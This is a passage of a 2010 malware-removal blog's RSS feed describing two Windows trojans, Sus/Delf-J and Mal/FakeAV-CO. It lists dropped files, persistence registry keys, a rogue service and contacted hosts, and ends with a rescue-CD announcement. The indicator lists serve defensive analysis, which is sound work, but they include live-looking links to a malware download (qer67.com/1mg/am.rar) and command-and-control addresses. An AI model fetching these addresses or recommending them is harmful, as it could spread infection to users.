<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;javahr&#8221;=&#8221;c:\\path\\javahr.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;javahr2&#8243;=&#8221;c:\\path\\javahr2.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />@=&#8221;"</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\Select]<br />&#8220;teste&#8221;=&#8221;0&#8243;</strong></p>
<p><strong> </strong></p>
<p> </p>
<ul>
<strong><br /></strong>
</ul>
<p> </p>
<h3 style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Removal Tools :</strong></h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong><br /></strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Download Sus/Delf-J, Trojan.Heur.GZ.kGX@bKStsDeG Trojan removal tool that provided by VirusExperts.org from <a title="MalFakeAV-CO-Downloader-CEW_Malware_Removal" href="http://www.virusexperts.org/wp-content/uploads/2010/04/susdelf-j_gentrojan.heur_.gz_trojan_removal_virusexperts.org_.zip" target="_blank">Here</a>. <span style="color: #ff0000;"><br /></span></strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p> </p>
<div style="font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>For any help contact us.</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>VirusExperts.org TEAM</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div id="_mcePaste" style="overflow: hidden; position: absolute; width: 1px; height: 1px; top: 741px; left: -10000px;">%Temp%\cvasds0.dll <br />%Temp%\cvasds1.dll <br />%Temp%\cvasds2.dll</div>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-win32-genome-aocx-susbehav-1021-outlook-exe-brazilian-exe-sysinternals-exe-trojan-downloader/' rel='bookmark' title='Permanent Link: Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader'>Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/' rel='bookmark' title='Permanent Link: Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM'>Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-trojdwnldr-ici-win32-genome-aodo-windowsupdate-exe-updt-exe-trojan/' rel='bookmark' title='Permanent Link: Removal tool for Troj/DwnLdr-ICI, Win32.Genome.aodo (windowsupdate.exe, updt.exe) Trojan'>Removal tool for Troj/DwnLdr-ICI, Win32.Genome.aodo (windowsupdate.exe, updt.exe) Trojan</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-susdelf-j-trojan-heur-gz-kgxbkstsdeg-foto_253-com-javahr-exe-javahr2-exe-javahu-exe-trojan/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 11:36:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[FAKEAV]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Not Detected]]></category>
		<category><![CDATA[Removal]]></category>
		<category><![CDATA[removal tool]]></category>
		<category><![CDATA[Removal Tools]]></category>
		<category><![CDATA[virusexperts.org]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2281</guid>
		<description><![CDATA[
Submited By Diego 
 
 
 

 
Severity Level : 6/10
 
Alias:

Mal/FakeAV-CO [Sophos]
Downloader-CEW [McAfee]
NOT Detected [Kaspersky Lab]
NOT Detected [Microsoft]

 
Vdk.exe VirusTotal Report : (Click Here)
 
File System Modifications
The following files were created in the system:
 

%userprofile%\Local Settings\Temp\ Perflib_Perfdata_714.dat
%userprofile%\Local Settings\Temp\ Vdj.exe 
%userprofile%\Local Settings\Temp\ Vdk.exe
%userprofile%\Local Settings\Temp\Vdl.exe 
%userprofile%\Local Settings\Temp\ sshnas21.dll
%systemroot%\ Vvavia.exe
%systemroot%\Tasks\{35DC3473-A719-4d14-B7C1-FD326CA84A0C}.job
%systemroot%\Tasks\{66BA574B-1E11-49b8-909C-8CC9E0E8E015}.job
%system%\sshnas21.dll

 
Note: 

%system% is a variable that refers to the System folder. By default, this is &#8220;C:\Windows\System&#8221; (Windows [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-win32-genome-aocx-susbehav-1021-outlook-exe-brazilian-exe-sysinternals-exe-trojan-downloader/' rel='bookmark' title='Permanent Link: Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader'>Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware'>Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"><img class="aligncenter size-full wp-image-2286" title="Mal-FakeAV-CO" src="http://www.virusexperts.org/wp-content/uploads/2010/03/Mal-FakeAV-CO.png" alt="" width="250" height="250" /></p>
<p style="border: 0px none ; margin: 0px; padding: 0px; text-align: center;"><span id="PresenceContainer">Submited By<strong> Diego<br /></strong></span><span id="PresenceContainer"><strong> </strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span id="more-2281"></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong><span style="color: #000000;">Severity Level :</span> 6/10</strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3><strong>Alias:</strong></h3>
<ul>
<li>Mal/FakeAV-CO <span style="color: #ff0000;"><strong>[Sophos]</strong></span></li>
<li>Downloader-CEW <span style="color: #ff0000;"><strong>[McAfee]</strong></span></li>
<li>NOT Detected <strong><span style="color: #ff0000;">[Kaspersky Lab]</span></strong></li>
<li>NOT Detected<strong> <span style="color: #ff0000;">[Microsoft]</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong><span style="color: #ff0000;">Vdk.exe </span>VirusTotal Report : (<a href="http://www.virustotal.com/analisis/d6b7441b2a2aad2d4524e5cbe1423b756ccb6192857065d5e33b7784631f0e40-1269566322" target="_blank">Click Here</a>)</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>File System Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The following files were created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<ul>
<li><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">Perflib_Perfdata_714.dat</span><br /></strong></li>
<li><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">Vdj.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">Vdk.exe</span></strong></li>
<li><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;">Vdl.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">sshnas21.dll</span></strong></li>
<li><strong>%systemroot%\<span style="color: #ff0000;"><span style="color: #000000;"> </span>Vvavia.exe</span></strong></li>
<li><strong>%systemroot%\Tasks\</strong><strong><span style="color: #ff0000;">{35DC3473-A719-4d14-B7C1-FD326CA84A0C}.job</span></strong></li>
<li><strong>%systemroot%\Tasks\</strong><strong><span style="color: #ff0000;">{66BA574B-1E11-49b8-909C-8CC9E0E8E015}.job</span></strong></li>
<li><strong>%system%</strong><strong>\<span style="color: #ff0000;">sshnas21.dll</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong>Note: </strong></span></p>
<ul>
<li><strong>%system%</strong> is a variable that refers to the System folder. By default, this is <strong>&#8220;C:\Windows\System&#8221;</strong> (Windows 95/98/Me), <strong>&#8220;C:\Winnt\System32&#8243;</strong> (Windows NT/2000), or<strong> &#8220;C:\Windows\System32&#8243;</strong> (Windows XP).</li>
<li><strong>?</strong> = Random file name.</li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Memory Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">There were new processes created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 151px;" border="0" cellspacing="0" cellpadding="5" width="498">
<tbody>
<tr>
<td>
<h3>Process Name</h3>
</td>
<td>
<h3>Process Filename</h3>
</td>
</tr>
<tr>
<td style="text-align: center;"><span style="color: #ff0000;"><strong>Vvavia.exe</strong></span></td>
<td><strong>%systemroot%\<span style="color: #ff0000;"><span style="color: #000000;"> </span>Vvavia.exe</span></strong><span style="color: #ff0000;"><strong> </strong></span></td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">Vdl.exe</span></strong></td>
<td><strong>%userprofile%\Local Settings\Temp\<span style="color: #ff0000;">Vdl.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><br /></span></strong></td>
<td><strong><br /></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>The following Internet action was started (the retrieved bits are saved into the local file):</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 125px;" border="0" cellspacing="0" cellpadding="5" width="545">
<tbody>
<tr>
<td>
<h3>URL to be downloaded</h3>
</td>
<td>
<h3>Filename for the downloaded bits</h3>
</td>
</tr>
<tr style="text-align: center;">
<td style="text-align: left;"><strong><span style="color: #ff0000;">www.chinaontv.com<br /></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;">smtp.yfc.logicalprocesses.com<a href="http://qer67.com/1mg/am.rar"><br /></a></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;">install.netwaq.com<a href="http://qer67.com/1mg/am.rar"><br /></a></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;">69.10.35.253<a href="http://qer67.com/1mg/am.rar"><br /></a></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Registry Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The newly created or modified Registry Value is:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong>[HKEY_CURRENT_USER\Software\WEK9EMDHI9]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\XML]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vj2&#8243;=&#8221;xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vj0&#8243;=&#8221;tSLPLpWL7R22spR48AI743bz2Kge8sEdwEqmsT37hAhii9o56M45qdHEQLL59eutSfWczpoAJiFx&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vj1&#8243;=&#8221;tSbFNJuL/h22spR48AI743bz2Kge8sEew1WeZUbE98hA0Rzkp3/l/FrHIYr5A4wiCO8Dph4h9+dbFwok9MptNDjCbOrr45GVFpV/sTDwF5BZNgDlPbNVQVn9lMwfvCcG4=&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz4&#8243;=dword:00015180</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz5&#8243;=dword:00000002</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz2&#8243;=dword:01cacd45</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz3&#8243;=dword:e2940770</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz6&#8243;=dword:00000001</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz0&#8243;=dword:01cacc7f</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vz1&#8243;=dword:123c6020</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\YVIBBBHA8C]<br />&#8220;Vj4&#8243;=&#8221;7SDUIc7NyUn+3vMc=&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;3&#8243;=&#8221;z+XaaugyuuSvEib0Hft72iB+UUk006BXeWC43zHlD+=&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;7&#8243;=&#8221;z/Taa/pl0NCrJEynBu9+nW4ctjyqwoD34SzQye9W6i8cdZ5R0prC0V28U=&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;5&#8243;=&#8221;z/DcO5EGvtLTXCm7FPhmgDwcNWID0/R+VgSJ5APKWrFlEp37TcOkOwzpj7qKzmXTMoC1URSbRM=&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;8&#8243;=dword:ffffffff</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;6&#8243;=dword:ffffffff</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;4&#8243;=dword:00000005</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Handle]<br />&#8220;12&#8243;=dword:01bc9309</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\12D4872BC3EF019E7E0B6F132480AE29DB5B1CA3]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\</strong></p>
<p><strong>12D4872,00,,732,30,30,39,2d,32,20,43,6,c9,5e,8,21,95,e4,d1,9c,50,435,3b,1e27,b0,e1,4d,34,7f,]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]<br />&#8220;HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\ivqrb-cyhtva.45158.rkr&#8221;=hex:01,00,00,00,06,00,00,00,50,94,91,a6,7c,cc,ca,01,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;YVIBBBHA8C&#8221;=&#8221;C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Vdl.exe&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\Documents and Settings\\Administrator\\Desktop\\video-plugin.45158.exe&#8221;=&#8221;video-plugin.45158&#8243;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\cmd.exe&#8221;=&#8221;Windows Command Processor&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]<br />&#8220;SystemComponent&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]<br />&#8220;Installer&#8221;=&#8221;MSICD&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]<br />&#8220;Precache&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]<br />@=&#8221;7,0,19,0&#8243;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\DownloadInformation]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\DownloadInformation]<br /><span>&#8220;CODEBASE&#8221;=&#8221;<a href="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab</a>&#8220;</span></strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]<br />&#8220;TrapPollTimeMilliSecs&#8221;=dword:00003a98</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;Type&#8221;=dword:00000020</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;Start&#8221;=dword:00000002</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;ErrorControl&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;ImagePath&#8221;=hex(2):25,53,79,73,74,65,6d,52,6f,6f,74,25,63,68,6f,73,745,20,2d,6]</strong></p>
<p><strong><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;DisplayName&#8221;=&#8221;SSHNAS&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]<br />&#8220;ObjectName&#8221;=&#8221;LocalSystem&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Parameters]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Parameters]<br />&#8220;ServiceDll&#8221;=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,2e,64,6c,6c,00,</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Security]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Security]<br />&#8220;Security&#8221;=hex:01,00,14,80,90,0,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,0,00,05,20,00,]</strong></p>
<p><strong> </strong></p>
<p> </p>
<ul>
<strong><br /></strong>
</ul>
<p> </p>
<h3 style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Removal Tools :</strong></h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong><br /></strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Download Mal/FakeAV-CO, Downloader-CEW Malware removal tool that provided by VirusExperts.org from <a title="MalFakeAV-CO-Downloader-CEW_Malware_Removal" href="http://www.virusexperts.org/wp-content/uploads/2010/03/malfakeav-co-downloader-cew_malware_removal_virusexperts.org_.zip" target="_blank">Here</a>. <span style="color: #ff0000;"><br /></span></strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p> </p>
<div style="font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>For any help contact us.</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>VirusExperts.org TEAM</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div id="_mcePaste" style="position: absolute; width: 1px; height: 1px; overflow: hidden; top: 741px; left: -10000px;">%Temp%\cvasds0.dll <br />%Temp%\cvasds1.dll <br />%Temp%\cvasds2.dll</div>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-win32-genome-aocx-susbehav-1021-outlook-exe-brazilian-exe-sysinternals-exe-trojan-downloader/' rel='bookmark' title='Permanent Link: Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader'>Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware'>Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AVG Rescue CD A powerful toolset for rescue &amp; repair of infected machines</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/avg-rescue-cd-a-powerful-toolset-for-rescue-repair-of-infected-machines/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=avg-rescue-cd-a-powerful-toolset-for-rescue-repair-of-infected-machines</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/avg-rescue-cd-a-powerful-toolset-for-rescue-repair-of-infected-machines/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 10:30:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[Anti-Virus]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[boot from cd]]></category>
		<category><![CDATA[bootable usb flash]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Portable]]></category>
		<category><![CDATA[Protection]]></category>
		<category><![CDATA[Removal]]></category>
		<category><![CDATA[rescue cd]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Support]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[updates]]></category>
		<category><![CDATA[USB]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[worms]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2273</guid>
		<description><![CDATA[
The AVG Rescue CD is a powerful must-have toolkit for the rescue and repair of infected machines. It provides essential utilities for system administrators and other IT professionals and includes the following features:

Comprehensive administration toolkit
System recovery from virus and spyware infections 
Suitable for recovering MS Windows and Linux operating systems (FAT32 and NTFS file systems)
Ability [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/bitdefender-2009-rescue-disk-cd/' rel='bookmark' title='Permanent Link: BitDefender 2009 Rescue Disk CD'>BitDefender 2009 Rescue Disk CD</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/regrun-reanimator-a-powerful-tool-kit-against-trojans-viruses-spyware-adware-and-rootkits/' rel='bookmark' title='Permanent Link: RegRun Reanimator &#8211; A powerful tool kit against Trojans, viruses, spyware, adware and rootkits'>RegRun Reanimator &#8211; A powerful tool kit against Trojans, viruses, spyware, adware and rootkits</a></li>
